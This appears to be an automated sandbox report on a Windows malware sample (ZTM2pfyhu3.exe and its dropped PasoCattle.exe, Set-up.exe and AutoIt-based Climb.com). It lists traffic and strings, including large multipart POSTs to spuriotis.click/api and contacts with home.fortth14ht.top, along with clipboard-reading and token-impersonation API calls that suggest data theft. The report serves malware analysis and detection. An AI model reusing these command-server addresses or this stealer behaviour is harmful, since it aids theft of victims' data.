Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SCDHFNJOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1170Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GSHDE4Q0M0OLFUCDDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551337Host: spuriotis.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004FD889 InternetReadFile,SetEvent,GetLastError,SetEvent,

14_2_004FD889

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top
Source: global traffic	DNS traffic detected: DNS query: spuriotis.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:51:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 13:51:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, 00000003.00000003.2349004763.0000000001047000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348806436.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348834892.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2349168343.000000000104A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP17352100036963
Source: Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000003.00000003.2349004763.0000000001047000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348806436.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2348834892.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2349168343.000000000104A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2350553252.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003Q
Source: Set-up.exe, 00000003.00000002.2349973615.00000000005D9000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000000.2104691821.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.00000000071D9000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Climb.com, 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Climb.com, 0000000E.00000003.2422514395.0000000004201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Climb.com, 0000000E.00000003.2424180192.00000000041EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000007094000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2349990148.00000000005DB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore
Source: Climb.com, 0000000E.00000003.2424180192.00000000041EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: ZTM2pfyhu3.exe, 00000000.00000002.2159283241.0000000006315000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Climb.com, 0000000E.00000002.2524996608.0000000001748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/
Source: Climb.com, 0000000E.00000002.2524996608.0000000001748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click//
Source: Climb.com, 0000000E.00000002.2524996608.0000000001748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/D
Source: Climb.com, 0000000E.00000003.2524122580.00000000041A1000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.2525215455.000000000187F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/api
Source: Climb.com, 0000000E.00000002.2525190238.000000000185C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/apil
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Climb.com, 0000000E.00000003.2322520245.0000000004683000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fingers.11.dr, PasoCattle.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Climb.com, 0000000E.00000003.2370972247.000000000421C000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371243752.00000000042E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Climb.com, 0000000E.00000003.2423697433.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.51:443 -> 192.168.2.5:49767 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004FF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

14_2_004FF7C7

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004FF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

14_2_004FF55C

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00519FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

14_2_00519FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ZTM2pfyhu3.exe.20000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: ZTM2pfyhu3.exe	Static PE information: section name:
Source: ZTM2pfyhu3.exe	Static PE information: section name: .idata
Source: ZTM2pfyhu3.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004F4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

14_2_004F4763

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004E1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

14_2_004E1B4D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		2_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004EF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		14_2_004EF20D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\UtilitySoccer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\MoveRefurbished	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\ClarkWriter	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_0040737E	2_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406EFE	2_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004079A2	2_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004049A8	2_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A8017	14_2_004A8017
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0049E144	14_2_0049E144
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0048E1F0	14_2_0048E1F0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004BA26E	14_2_004BA26E
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004822AD	14_2_004822AD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A22A2	14_2_004A22A2
